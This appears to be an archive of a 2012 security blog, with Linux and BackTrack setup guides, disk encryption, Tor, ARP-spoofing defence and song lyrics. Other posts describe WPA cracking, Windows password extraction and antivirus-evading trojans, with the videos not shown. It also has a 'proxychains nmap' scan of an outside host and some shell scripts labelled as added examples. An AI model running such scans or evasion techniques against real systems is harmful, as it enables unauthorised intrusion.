In addition, this software has no other modules file (dll) that is not compiled with SafeSEH and all the system files are SafeSEHed. Although you can find a pointer at unicode.nls but because of null byte there is no chance to make the shellcode to work.

At least, I find out that so far. If anyone find out any method to exploit this software on Windows XP SP3 or up, please let me know. By the way, the ret2libc and ROP methods I have not been tried yet.

Therefore, it is only affect Windows XP SP2 and below. Since Windows XP SP2 is not supported by Microsoft any more, I think the developer of the software think that it is not necessary to fix the vulnerability.

That's all! See you.

Thursday, August 16, 2012

HOWTO : Back|Track 5 r3 on Gigabyte TouchNote T1028X/M1028

The Gigabyte TouchNote T1028X/M1028 is equipped with an Intel Atom N280 and an eGalax touch screen. It runs Back|Track 5 r3 flawlessly except for the touchpad. This tutorial shows you how to overcome that problem.

The kernel version of Back|Track 5 r3 is 3.2.6 and the touch screen works flawlessly.

Touchscreen Hardware

"lsusb" shows the following :

Bus 005 Device 002: ID 0eef:0001 D-WAV Scientific Co., Ltd eGalax TouchScreen

Step 1 :

Boot the 32-bit version of Back|Track 5 r3 from a USB stick created with Unetbootin, or from DVD-ROM. On the menu screen, press "Tab" and append the following to the end of the line.

i8042.noloop=1 reboot=b

Then install as usual and reboot.

Step 2 :

After login, enter the following :

nano /etc/default/grub

Append "i8042.noloop=1 reboot=b" to "GRUB_CMDLINE_LINUX_DEFAULT".

It will look like this :

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i8042.noloop=1 reboot=b"

Save and exit.

Then execute the following commands :

update-grub
fix-splash


Then power off the computer and switch it on again.

That's all! See you.

Saturday, August 11, 2012

HOWTO : Encrypt the Home Directory in Ubuntu

You may want to encrypt your home directory, or any other user's home directory, if you did not set it up during the installation of Ubuntu.

Step 1 :

sudo apt-get install ecryptfs-utils

Step 2 :

Create a temporary administrative user (the user must exist before it can be added to the admin group) :

sudo adduser tempuser
sudo adduser tempuser admin

Logout and re-login as tempuser.

Step 3 :

sudo ecryptfs-migrate-home -u samiux

Logout and re-login as samiux, but DO NOT reboot your system.

If you are not asked for the "Passphrase", enter the following command :

sudo ecryptfs-add-passphrase

Step 4 (Optional) :

You can display the passphrase at any time with the following command :

sudo ecryptfs-unwrap-passphrase

Save the "Passphrase" somewhere and keep it safe for manual recovery.

Step 5 (Optional) :

I suggest you encrypt the swap too.

sudo ecryptfs-setup-swap

Step 6 :

Then, if everything is working fine, you can delete the randomized backup of the old home directory and delete the tempuser.

sudo rm -rf /home/samiux.*
sudo deluser --remove-home tempuser
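Step 6 is irreversible, so as an added example (not part of the original HOWTO) here is a guard that only emits the cleanup commands once /proc/mounts shows that the user's home is really an eCryptfs mount, and reports the cipher in use. The mounts text below is constructed in /proc/mounts format; for real use pass "$(cat /proc/mounts)".

```shell
# Constructed /proc/mounts sample (fields: device, mountpoint, fstype, options, dump, pass).
SAMPLE_MOUNTS='/dev/sda1 / ext4 rw,errors=remount-ro 0 0
/home/.ecryptfs/samiux/.Private /home/samiux ecryptfs rw,nosuid,nodev,relatime,ecryptfs_sig=0123456789abcdef,ecryptfs_cipher=aes,ecryptfs_key_bytes=16,ecryptfs_unlink_sigs 0 0
tmpfs /run tmpfs rw,nosuid,noexec,relatime 0 0'

# home_is_ecryptfs USER MOUNTS_TEXT
# Exit 0 only when /home/USER is mounted with filesystem type ecryptfs.
home_is_ecryptfs() {
    printf '%s\n' "$2" | awk -v home="/home/$1" '
        $2 == home && $3 == "ecryptfs" { found = 1 }
        END { if (found) exit 0; exit 1 }'
}

# ecryptfs_cipher USER MOUNTS_TEXT
# Prints "<cipher>/<key_bytes>" taken from the mount options, e.g. "aes/16".
ecryptfs_cipher() {
    printf '%s\n' "$2" | awk -v home="/home/$1" '
        $2 == home && $3 == "ecryptfs" {
            n = split($4, opt, ",")
            for (i = 1; i <= n; i++) {
                if (opt[i] ~ /^ecryptfs_cipher=/)    { split(opt[i], kv, "="); c = kv[2] }
                if (opt[i] ~ /^ecryptfs_key_bytes=/) { split(opt[i], kv, "="); k = kv[2] }
            }
            print c "/" k
        }'
}

# cleanup_commands USER MOUNTS_TEXT
# Emits the Step 6 commands only when the encrypted home is mounted; otherwise
# prints nothing and fails, so nothing destructive is run by accident.
cleanup_commands() {
    home_is_ecryptfs "$1" "$2" || return 1
    printf 'sudo rm -rf /home/%s.*\nsudo deluser --remove-home tempuser\n' "$1"
}

# Stand-alone demonstration on the constructed sample.
printf 'cipher in use: %s\n' "$(ecryptfs_cipher samiux "$SAMPLE_MOUNTS")"
cleanup_commands samiux "$SAMPLE_MOUNTS" || echo "home of samiux is not an eCryptfs mount; do not delete anything"
```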

That's all! See you.

Tuesday, July 31, 2012

Torified Ubuntu VPN Server

Tor gives you anonymity online. It protects your privacy and defends you against network surveillance and traffic analysis.

Setting up Tor is quite complicated and sometimes you will fail to make it work. The easiest way is to download the Tor Browser. However, it has some limitations, the main one being that it is for web browsing only.

The drawback of using Tor is the speed. It is quite slow because the traffic passes through a lot of nodes in order to hide your IP address and traffic. Your IP will change every 10 minutes, and the IP does not belong to your home country.

Learn more about Tor.

I created a Torified Ubuntu VPN Server in order to overcome some of the limitations of Tor, except the speed. It is still under heavy development. The final product will be released soon.

Update

NightHawk - Torified Ubuntu VPN Server was released on August 3, 2012. You can download it from the official site.

NightHawk in Action



Installation and Configuration



That's all! See you.

Sunday, July 29, 2012

The Corrs - Full acoustic concert




00:23 Only When I sleep
04:55 What Can I do?
09:48 Radio
14:25 Toss The Feathers
17:56 Everybody Hurts
23:50 Dreams
27:48 Runaway
32:40 Forgiven, Not Forgotten
38:00 At Your Side
43:00 Little Wing
48:00 No Frontiers
52:48 Queen of Hollywood
57:40 Old Town
1:01:00 Lough Erin Shore
1:05:38 So Young

The Corrs - What Can I Do





Lyrics

I haven't slept at all in days
It's been so long since we've talked
And I have been here many times
I just don't know what I'm doing wrong

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

There's only so much I can take
And I just got to let it go
And who knows I might feel better
If I don't try and I don't hope

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

No more waiting, no more aching
No more fighting, no more trying

Maybe there's nothing more to say
And in a funny way I'm calm
Because the power is not mine
I'm just gonna let it fly

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

Love me

Saturday, July 28, 2012

VEGA - Web application vulnerabilities scanner

Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.



That's all! See you.

Get Windows system passwords without hash decryption

Almost all Windows versions are affected. The following video was not made by me; it shows you how.



That's all! See you.

Friday, July 27, 2012

Why do you need to learn hacking skills?

System administrators and programmers can be ethical hackers too, not just penetration testers.

Ethical hackers and hackers speak the same language, use the same tools and play the same game.

Learn to hire a thief to try to steal something but don't hire a cop.



That's all! See you.

Wednesday, July 25, 2012

Enterprise WiFi Worms, Backdoors and Botnets for fun & profit

Windows 7 has a feature to create a Wi-Fi access point on your laptop. Hackers can take advantage of this feature to compromise your networks by means of worms and/or backdoors, combined with social engineering, to build a botnet.

Vivek Ramachandran shows you the concept and how it works.



That's all! See you.

Saturday, July 21, 2012

Revolution OS

What is GNU? What is Open Source? What is Linux and how did it grow?

Want to know? Just watch this video.



That's all! See you.

Web Warriors

This is another slightly out-dated video (from around 2003) that is worth watching.

This video talks about viruses and the damage they cause. The victims are almost all Windows systems. The video also talks about botnets and DDoS. They also think that some powerful viruses were created in China.

By the way, this video also introduces what Black Hat, Grey Hat and White Hat mean.



That's all! See you.

Hackers : Outlaws and Angels

This is an inside story about hackers on both sides, outlaws and angels (White Hat and Black Hat). It is a bit out-dated (from around 2002) but it is still worth watching, in my opinion.

Hacking means finding weaknesses in a computer or computer network, though the term can also refer to someone with an advanced understanding of computers and computer networks. Hackers may be motivated by a multitude of reasons, such as profit, protest, or challenge. The subculture that has evolved around hackers is often referred to as the computer underground, but it is now an open community. While other uses of the word hacker exist that are not related to computer security, they are rarely used in a mainstream context. They are subject to the long-standing hacker definition controversy about the true meaning of the term hacker. In this controversy, the term hacker is reclaimed by computer programmers who argue that someone breaking into computers is better called a cracker, making no distinction between computer criminals (black hats) and computer security experts (white hats). Some white hat hackers claim that they also deserve the title hacker, and that only black hats should be called crackers.

"Learn to hire a thief to try to steal something, don't hire a cop." (at 16:50)

"The battle between the angels and outlaws seems set to continue. But hackers on both sides know that, like in many conflicts, the people on both sides speak the same language, use the same tools and play the same game." (at 47:58)



That's all! See you.

Friday, July 06, 2012

NEWS : Latest message from LulzSec

I think everyone out there should have heard about LulzSec.

The statement below is copied from Wikipedia :

"Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claimed responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline."

The following is believed to be the latest message from LulzSec :

LulzSec: All your base are belong to us



Just for information. Nothing else.

That's all! See you.

Saturday, June 30, 2012

HOWTO : Protect yourself from ARP spoofing

Updated on Dec 4, 2014.

ARP spoofing is a kind of Man-in-the-Middle (MitM) attack and it affects the machines in the same subnet.

Who is affected? Almost everyone: free Wi-Fi connections, even when encrypted with WPA/WPA2; your local network; every machine inside a subnet.

What about using SSL and SSH, or VPNs? No, those cannot protect you from being attacked by ARP spoofing. Even a switch cannot protect you from being attacked. Please refer to this presentation.

ARP security is often ignored and nobody cares about lower-layer security nowadays. ARP attacks are a real threat with high impact.

Can I protect myself from being attacked? Yes, you can. The following tools will alert you when an attack is taking place.

If you are a Linux user, you can use ArpON. If you are a Windows user, you can use XARP - Advanced ARP Spoofing Detection.

Ubuntu or Debian users can install it by following the instructions at ArpON on Kali Linux 1.0.9a.

If you are a Mac OS X user, you can use ARP Guard. See also ArpON on Mac OS X Yosemite 10.10.1.

If you are an Android user, you can use WiFi ARP Guard.

ArpON for Linux can protect you from the attacks, while the others only alert you to them. In addition, ARP Guard costs money while the others are free of charge.

Or, if you do not want to install the software above and your router can set static ARP entries, do so and your subnet is protected once they are set.

Please note that ARP Guard for Mac OS does not do the job well. It could not detect any ARP spoofing when I tested it on Mac OS X 10.10.1.
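As an added example (not part of the original post), this is the detection logic behind tools like ArpON or XARP reduced to its core: a log of observed "IP MAC" ARP replies is scanned for any IP whose MAC changes, and separately checked against a static ARP table like the one the post suggests setting on the router. Both the reply log and the static table are constructed samples, not captured traffic.

```shell
# Constructed log of observed ARP replies ("IP MAC" per line), not real traffic.
SAMPLE_ARP_LOG='192.168.1.1 00:11:22:33:44:55
192.168.1.20 aa:bb:cc:dd:ee:01
192.168.1.1 00:11:22:33:44:55
192.168.1.1 DE:AD:BE:EF:00:01
192.168.1.20 aa:bb:cc:dd:ee:01'

# Constructed static table pinning the gateway's MAC (same "IP MAC" format).
STATIC_ARP='192.168.1.1 00:11:22:33:44:55'

# detect_arp_changes LOG_TEXT
# Prints "ALERT <ip> <old_mac> -> <new_mac>" whenever an IP is seen with a
# different MAC than before, the classic spoofing symptom. Exit 1 on any alert.
detect_arp_changes() {
    printf '%s\n' "$1" | awk '
        NF >= 2 {
            ip = $1; mac = tolower($2)
            if ((ip in seen) && seen[ip] != mac) {
                printf "ALERT %s %s -> %s\n", ip, seen[ip], mac
                alerts++
            }
            seen[ip] = mac
        }
        END { if (alerts) exit 1; exit 0 }'
}

# static_arp_violations STATIC_TEXT LOG_TEXT
# Every observed reply for an IP present in the static table must carry the
# pinned MAC; anything else is printed as "VIOLATION <ip> <seen_mac>".
# Exit 1 if any violation was found. The static lines are tagged so one awk
# pass can read both inputs.
static_arp_violations() {
    { printf '%s\n' "$1" | sed 's/^/STATIC /'; printf '%s\n' "$2"; } | awk '
        $1 == "STATIC" { pinned[$2] = tolower($3); next }
        NF >= 2 && ($1 in pinned) && tolower($2) != pinned[$1] {
            printf "VIOLATION %s %s\n", $1, tolower($2)
            bad++
        }
        END { if (bad) exit 1; exit 0 }'
}

# Stand-alone demonstration on the constructed sample.
detect_arp_changes "$SAMPLE_ARP_LOG" || echo "ARP spoofing suspected: a MAC changed"
static_arp_violations "$STATIC_ARP" "$SAMPLE_ARP_LOG" || echo "static ARP table violated"
```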

There is another way to protect yourself from ARP spoofing if you are a Linux user and do not want to install the software above. You can follow the instructions in the following video, which was created by xiedi01 :



Want to see a demo of how ARP spoofing works? The demo is by Hak5 and the first demo starts at 07:24.





The following demo is conducted under Back|Track 5 R2 by MasterButcher68.



There are tools that perform this attack automatically, so the attacker requires no skill to do so; even a script kiddie can handle it. One of these tools is YAMAS - Yet Another Man in The Middle Automation Script.



That's all! See you.

Tuesday, June 19, 2012

HOWTO : BackTrack 5 R2 on Intel X79 Express and nVidia display cards (The better way)

Uninstall the manually installed driver

The previous HOWTO is here.

If you followed the previous HOWTO to install the nVidia driver, you can uninstall it with the following command :

./NVIDIA-Linux-x86-295.20.run --uninstall

The better way to install nVidia driver

Step 1 :

add-apt-repository ppa:ubuntu-x-swat/x-updates

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

Step 2 :

Reboot your system.

After the reboot, issue the following commands :

nvidia-xconfig
splash-fix

Then, reboot your system again.

If you install the nVidia driver this way, you do not need to reinstall the driver after the kernel is updated.

You can follow the other parts of the previous HOWTO for sample code for CUDA and Pyrit.

That's all! See you.

Wednesday, June 06, 2012

HOWTO : VPN (PPTP) on BackTrack 5 R2

Step 1 :

apt-get update
apt-get dist-upgrade


apt-get install network-manager-gnome network-manager-pptp

Step 2 :

cp /etc/network/interfaces /etc/network/interfaces.bak

nano /etc/network/interfaces

Delete all entries but leave the first two lines in place.

auto lo
iface lo inet loopback


Step 3 :

service network-manager start

Step 4 :

System >> Startup Applications >> Network Manager

Append "&" to the end of the Command. It will look like this :

nm-applet --sm-disable &

Make sure Start dhclient is enabled in the menu of Startup Applications.

Reboot the system and then configure your VPN (PPTP) as usual.

Make sure Advanced >> Use Point-to-Point encryption (MPPE) is enabled in the Configuration of PPTP.

That's all! See you.

Tuesday, May 22, 2012

HOWTO : Flash-Aid 2.2.3 for Ubuntu

Do you see blue faces or wrong colours in YouTube videos on your Ubuntu 12.04 box? If yes, I recommend installing Flash-Aid, which can solve the problem.

Open Firefox and go here to install the plugin. Once the plugin is installed, click the icon in the top right corner to install the correct Flash.

The official description of Flash-Aid :

Remove conflicting flash plugins from Ubuntu/Debian Linux systems, install the appropriate version according to system architecture and apply some tweaks to improve performance and fix common issues.

That's all! See you.

UPDATED on May 23, 2012 :

If your problem is still there and you have an nVidia display card with "libvdpau1" installed, follow the steps below to solve the problem.


sudo add-apt-repository ppa:tikhonov/misc
sudo apt-get update
sudo apt-get install libvdpau1


This solution works on Ubuntu 12.04 LTS with flashplugin-installer 11.2.202.235ubuntu0.12.04.1 but not with Flash-Aid 2.2.3.

HOWTO : Cracking WPA/WPA2 without dictionary

This video was not created by me. It was created by Kardipapa. The original video is here.

I uploaded it here for my own reference only.



That's all! See you.

UPDATED on May 22, 2012 :

The following links are my Proofs of Concept (PoC), written on April 16, 2010 and May 22, 2011 respectively. Kardipapa confirmed that my Proof of Concept works.

Using John the Ripper (written by me on April 16, 2010 as my Proof of Concept) :

HOWTO : Crack WPA/WPA2-PSK with John the Ripper

Using Crunch and Pyrit (written by me on May 22, 2011 as my Proof of Concept) :

HOWTO : WPA/WPA2 cracking with Back|Track 5

HOWTO : Scapy 2.2.0 on Ubuntu 12.04 LTS

To install Scapy

sudo apt-get update
sudo apt-get install python-scapy python-pyx python-gnuplot

To run Scapy interactively

sudo scapy

The Scapy shell will be displayed :

WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>>


To quit Scapy

>>> quit()

That's all! See you.

Tuesday, May 01, 2012

HOWTO : VulnImage (Manual & Automated)

These videos were not created by me; they were created by g0tmi1k. Please credit him.

The amazing one is the Manual method, and you can find the original post here. It covers exploit development on the fly.

The Automated method is here.

You can download VulnImage here.


Manual Method

Automated Method

That's all! See you.

HOWTO : Kioptrix 4 (Level 1.3)

The following videos were not created by me. They were created by one of my mentors, g0tmi1k. I re-post them here for reference. Please credit g0tmi1k.

Get Kioptrix 4 (Level 1.3) here.

For hints and solutions, please refer to g0tmi1k's blog here.

g0tmi1k found three different ways to compromise Kioptrix; here you are (Enjoy!!!) :


SQL Injection

Local File Inclusion


Limited Shell



That's all! See you.

Wednesday, April 11, 2012

Undetectable Trojan on Windows 7 SP1 and AVG Anti-Virus Free Edition 2012

Maybe some people out there think their systems are safe when an anti-virus program is installed and the firewall is enabled. However, that is not true.

This video proves that an anti-virus program and a firewall can be bypassed. It is meant to WARN you all NOT to download any pirated or cracked software, and NOT to download any software from an untrusted source.

The technique used in the video can be applied to any file format, such as video, PDF, photo/picture, audio and executable files.

About the video

The demo Windows 7 SP1 in the video is in its default settings as installed.

- Windows 7 SP1 is fully updated as on April 11, 2012.
- AVG Anti-Virus Free Edition 2012 is installed and fully updated as on April 11, 2012.
- UAC is set to default on Windows 7 SP1.
- Firewall is enabled and no extra program is allowed (default settings).
- AVG Anti-Virus Free Edition 2012 has no whitelist set

As a result, the Trojan-injected PuTTY program is not detected by AVG Anti-Virus, by UAC/Defender on Windows 7 SP1, or by the firewall.



That's all! See you.

Undetectable Trojan on Windows 7 and AVG Anti-Virus

Maybe some people out there think their systems are safe when an anti-virus program is installed and the firewall is enabled. However, that is not true.

This video proves that anti-virus programs and firewalls can be bypassed. It is meant to WARN you all NOT to download any pirated or cracked software, and NOT to download any software from an untrusted source.

The technique used in the video can be applied to any file format, such as video, PDF, photo/picture, audio and executable files.

About the video

The demo Windows 7 in the video is in its default settings as installed.

- Windows 7 is fully updated as on April 10, 2012.
- AVG Anti-Virus is installed and fully updated as on April 10, 2012.
- UAC is set to default on Windows 7.
- Firewall is enabled and no extra program is allowed (default settings).
- AVG Anti-Virus has no whitelist set

As a result, the Trojan-injected PuTTY program is not detected by AVG Anti-Virus, by UAC/Defender on Windows 7, or by the firewall.



That's all! See you.

Wednesday, March 28, 2012

HOWTO : Using The Onion Router (Tor) anonymously

Part A - Installation of Tor

(A1) Ubuntu or BackTrack 5 R2

Step 1 :

sudo add-apt-repository ppa:ubun-tor/ppa
sudo apt-get update
sudo apt-get install tor tor-geoipdb privoxy vidalia


Step 2 :

sudo nano /etc/privoxy/config

Append the following line :

forward-socks5 / 127.0.0.1:9050 .

sudo /etc/init.d/privoxy start
sudo /etc/init.d/tor start


Step 2a (Optional) :

If you are behind a firewall, NAT or router, you should append the following line to the configuration file.

forward 192.168.*.*/ .

Step 3 :

Go to the Tor official site to download and install the Torbutton for Firefox.

https://www.torproject.org/dist/torbutton/torbutton-current.xpi

(A2) Windows 7

Download the current version of the Tor Browser Bundle, 2.2.35-8.

https://www.torproject.org/dist/torbrowser/tor-browser-2.2.35-8_en-US.exe

Extract it, place the files inside a folder and make a shortcut on the desktop.

Part B - Installation of xChat

(B1) Ubuntu or BackTrack 5 R2

Step 4 :

dig +short irc.tor.freenode.net cname

The result is :

p4fsi4ockecnea7l.onion.

sudo nano /etc/tor/torrc

Append the following line.

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 5 :

sudo /etc/init.d/tor restart

sudo apt-get install xchat

Step 6 :

If you already have a username on Freenode, you can skip this step.

/msg nickserv register [password] [email]

/msg nickserv set hidemail on

Step 7 :

At the xChat, go to "Settings" | "Preferences" | "Network" | "Network setup" | "Proxy server", enter :

Hostname : 127.0.0.1
Port : 9050
Type : Socks5
Use proxy for : IRC Server Only


Step 8 :

Create a new server "TorifiedFreenode" in the xChat server list.

Press "Add" and then fill it in as "10.40.40.40".

Step 9 :

Download the cap_sasl_xchat.pl at http://lwsitu.com/xchat/cap_sasl_xchat.pl and save it at ~/.xchat2 and make it executable.

Step 10 :

In the status window of xChat :

/sasl set TorifiedFreenode [your_Freenode_Nickname] [your_Nick_password] PLAIN

Step 11 :

Block CTCP and DCC commands and queries sent to your IRC client software :

/ignore *!*@* CTCP DCC
/ignore * CTCP DCC

/set irc_hide_version ON
/set dcc_auto_chat 0
/set dcc_auto_resume OFF
/set dcc_auto_send 0


(B2) Windows 7

Step 12 :

Download the xChat at http://www.silverex.org/download/ and then install it.

Step 12a :

At the Vidalia Control Panel, select "Settings" | "Advanced" | "Edit current torrc", append the following line :

mapaddress 10.40.40.40 p4fsi4ockecnea7l.onion

Step 13 :

Download the ActivePerl version 5.12.4.1205 at http://www.activestate.com/activeperl/downloads/thank-you?dl=http://downloads.activestate.com/ActivePerl/releases/5.12.4.1205/ActivePerl-5.12.4.1205-MSWin32-x86-294981.msi

Step 14 :

Download the xcperl5.12.1.dll at http://lwsitu.com/xchat/xcperl5.12.1.dll

Then save it in c:\Program Files (x86)\X-Chat 2\plugins and delete the xcperl.dll after that.

Step 15 :

Follow Steps 6 to 11 above.

Part C - Installation of Filezilla

(C1) Ubuntu and BackTrack 5 R2

Step 16 :

sudo apt-get update
sudo apt-get install filezilla


Step 17 :

Open Filezilla, go to "Edit" | "Settings" | "Generic proxy" :

Select "Socks5"

proxy host : 127.0.0.1
proxy port : 9050



(C2) Windows 7

Step 18 :

Download the current Windows version :

http://filezilla-project.org/download.php?type=client

Then follow Step 17 above.

Part D - Using Tor in Console

Ubuntu and BackTrack 5 R2 only.

Step 19 :

sudo apt-get update
sudo apt-get install proxychains elinks


Step 20 :

sudo nano /etc/proxychains.conf

Change the following line :

socks4 127.0.0.1 9050

To :

socks5 127.0.0.1 9050

Step 21 :

Usage -

proxychains nmap google.com
proxychains elinks cmyip.com
proxychains elinks www.whatismyip.com


That's all! See you.

Saturday, March 10, 2012

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

Credit to : Infosec Ramblings and Hak5.org

Step 1 :

The hard drive partitioning is as follows :

/dev/sda1 for /boot
/dev/sda5 for /

Assume the hard drive is brand new.

fdisk /dev/sda
n
p
1
+4G
n
e
2
n
l
p
w


* where +4G sets /dev/sda1 (the /boot partition) to 4GB. You can set it to +1024M or smaller.

Step 2 :

cryptsetup -y -c aes-xts-plain -s 512 luksFormat /dev/sda5
cryptsetup luksOpen /dev/sda5 haktop


* where haktop is the device label

Step 3 :

mkfs.ext2 /dev/sda1
mkfs.ext4 /dev/mapper/haktop


Step 4 :

Install BackTrack 5 R2 as usual, but select custom partitioning. Do not format the partitions. Select /dev/mapper/haktop as ext4 mounted at /, and /dev/sda1 as ext2 mounted at /boot.

Make sure the bootloader is installed at /dev/sda.

Step 5 :

Once the installation is completed, select "Continue testing" and do not reboot the system.

mkdir /mnt/haktop

mount /dev/mapper/haktop /mnt/haktop/
mount /dev/sda1 /mnt/haktop/boot

chroot /mnt/haktop/

mount -t proc proc /proc
mount -t sysfs sys /sys/


Step 6 :

Get the UUID of sda5 by opening another terminal :

blkid /dev/sda5

Copy down the UUID of /dev/sda5.

nano /etc/crypttab

haktop /dev/disk/by-uuid/<UUID Key> none luks

Step 7 :

nano /usr/share/initramfs-tools/scripts/local-top/cryptroot

Locate the following :

# Try to get a satisfactory password $crypttries times
   count=0
   while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do


Change to :

count=0
echo "Unlocking the disk $cryptsource ($crypttarget)"
while [ $crypttries -le 0 ] || [ $count -lt $crypttries ]; do


Locate the following :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Unlocking the disk $cryptsource ($crypttarget)\nEnter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then


Change to :

if [ -z "$cryptkeyscript" ]; then
   cryptkey="Enter passphrase: "
if [ -x /bin/plymouth ] && plymouth --ping; then


Step 7a :

update-initramfs -u

fix-splash

Now, reboot the system. The boot will halt at the BackTrack 5 wallpaper. Just press F8, delete the prompted "****" and then enter your passphrase to boot the system.

Or, you can just type the passphrase when the boot process stops at the wallpaper.

Step 8 : (Optional)

If you do not want to press F8, you can delete "splash" from the following line.

nano /boot/grub/grub.cfg

Locate the following :

linux /vmlinuz-3.2.6 root=/dev/mapper/haktop ro text splash vga=791

So that it looks like :

linux /vmlinuz-3.2.6 root=/dev/mapper/haktop ro text vga=791

Then you will be prompted for your passphrase on every boot.

Step 9 :

After the system has booted, you need to create a swap file.

dd if=/dev/zero of=/swapfile1 bs=1M count=8192

* where count=8192 is 8GB

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0


Then reboot the system.

See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick


That's all! See you.

Friday, March 09, 2012

HOWTO : Encrypt/Decrypt BackTrack 5 R2 with USB stick

Credit to : Hak5.org

Step 1 :

To check the device label :

sfdisk -l /dev/sda
sfdisk -l /dev/sdc


*** Where sda is my hard drive and sdc is the USB stick

Step 2 :

To partition the following devices with a Linux partition :

fdisk /dev/sda
d
n
p
1
p
w


fdisk /dev/sdc
d
n
p
1
p
w


Step 3 :

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/first.key

cryptsetup -c aes-xts-plain -s 512 luksFormat /dev/sda1 /tmp/first.key

cryptsetup -d /tmp/first.key luksOpen /dev/sda1 mylaptop

ls /dev/mapper


Step 4 :

mkfs.ext2 /dev/sdc1

mkfs.ext4 /dev/mapper/mylaptop


*** Where mylaptop is the label of the device.

Step 5 :

Install BackTrack 5 R2 as usual. However, do not format the partitions. Select /dev/mapper/mylaptop as ext4 mounted at /. Then select /dev/sdc1 as ext2 mounted at /boot.

After that, make sure the bootloader is installed on /dev/sdc.

Step 6 :

Once the installation is completed, select "Continue testing" and do not reboot.

dd if=/dev/sdc bs=1 count=64 skip=32 of=/tmp/second.key

Make sure the two keys are different :

sha1sum /tmp/*key

Step 7 :

cryptsetup -d /tmp/first.key luksAddKey /dev/sda1 /tmp/second.key

mkdir /mnt/mylaptop

mount /dev/mapper/mylaptop /mnt/mylaptop/
mount /dev/sdc1 /mnt/mylaptop/boot

chroot /mnt/mylaptop/

mount -t proc proc /proc
mount -t sysfs sys /sys/


Step 8 :

nano /etc/crypttab

blkid /dev/sda1

mylaptop /dev/disk/by-uuid/<UUID Key> none luks

nano /etc/fstab

/dev/sdb1 /boot ext2 defaults 0 2


Step 9 :

After that, boot BackTrack 5 R2 from the USB stick. It will drop you into BusyBox.

In BusyBox, enter the following commands to unlock the partition. You are required to enter these commands on every boot.

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop


Then press Ctrl-D to continue the boot process.

Step 10 :

After the system has booted, you need to create a swap file.

dd if=/dev/zero of=/swapfile1 bs=1M count=512

* where count=512 is 512M

mkswap /swapfile1
chown root:root /swapfile1
chmod 0600 /swapfile1

swapon /swapfile1

nano /etc/fstab

/swapfile1 swap swap defaults 0 0


Then reboot the system.

Remarks :

You are required to enter these commands on every boot :

dd if=/dev/sdb bs=1 count=64 skip=32 of=/tmp/mykey.key

cryptsetup -d /tmp/mykey.key luksOpen /dev/sda1 mylaptop
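The two hand-done steps in this HOWTO and in the passphrase HOWTO above that most often go wrong are copying the UUID into /etc/crypttab and checking that the two USB key extracts differ. As an added example (not code from either post), the script below builds the crypttab line from blkid output and refuses anything that is not a LUKS partition, and does the key-difference check with sha1sum; the blkid lines and the "stick" images are constructed so it runs without real devices.

```shell
# Constructed blkid output lines (real ones come from "blkid /dev/sda5").
SAMPLE_BLKID='/dev/sda5: UUID="0f1e2d3c-4b5a-6978-8796-a5b4c3d2e1f0" TYPE="crypto_LUKS"'
SAMPLE_BLKID_BOOT='/dev/sda1: UUID="11111111-2222-3333-4444-555555555555" TYPE="ext2"'

# crypttab_entry NAME BLKID_LINE
# Prints "NAME /dev/disk/by-uuid/<UUID> none luks" (the line written in
# Step 6 of the passphrase HOWTO and Step 8 of the USB-stick HOWTO).
# Fails without output when TYPE is not crypto_LUKS or no UUID is present,
# so a wrong partition cannot end up in /etc/crypttab.
crypttab_entry() {
    printf '%s\n' "$2" | awk -v name="$1" '
        {
            uuid = ""; type = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^UUID="/) { uuid = $i; gsub(/^UUID="|"$/, "", uuid) }
                if ($i ~ /^TYPE="/) { type = $i; gsub(/^TYPE="|"$/, "", type) }
            }
            if (uuid != "" && type == "crypto_LUKS") {
                printf "%s /dev/disk/by-uuid/%s none luks\n", name, uuid
                ok = 1
            }
        }
        END { if (ok) exit 0; exit 1 }'
}

# usb_key_bytes IMAGE OUT
# The same extraction the posts do with dd: 64 bytes starting at offset 32,
# from a file or a block device such as /dev/sdc.
usb_key_bytes() {
    dd if="$1" of="$2" bs=1 count=64 skip=32 2>/dev/null
}

# keys_differ FILE1 FILE2
# Succeeds only when the SHA-1 digests of the two key files differ
# (Step 6 "Make sure the keys are different").
keys_differ() {
    a=$(sha1sum "$1" | cut -d' ' -f1)
    b=$(sha1sum "$2" | cut -d' ' -f1)
    [ "$a" != "$b" ]
}

# make_fake_stick OUT SEED
# Writes a constructed 256-byte "device image" for dry runs; different seeds
# give different contents, standing in for two different USB sticks.
make_fake_stick() {
    awk -v seed="$2" 'BEGIN { for (i = 0; i < 256; i++) printf "%c", 33 + (i * 7 + seed) % 90 }' > "$1"
}

# Stand-alone demonstration on the constructed blkid line.
crypttab_entry haktop "$SAMPLE_BLKID" || echo "not a LUKS partition, refusing to write crypttab"
```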


See Also : HOWTO : Encrypt/Decrypt BackTrack 5 R2 with Passphrase

That's all! See you.

HOWTO : Pyrit Cluster with BackTrack 5 R2

Install the nVidia CUDA drivers and Pyrit as described here.

(A) Server (with the GPUs) settings

Run pyrit at least once and you will have the following file at ~/.pyrit/config :

default_storage = file://
limit_ncpus = 0
rpc_announce = true
rpc_announce_broadcast = false
rpc_knownclients =
rpc_server = false
workunit_size = 75000


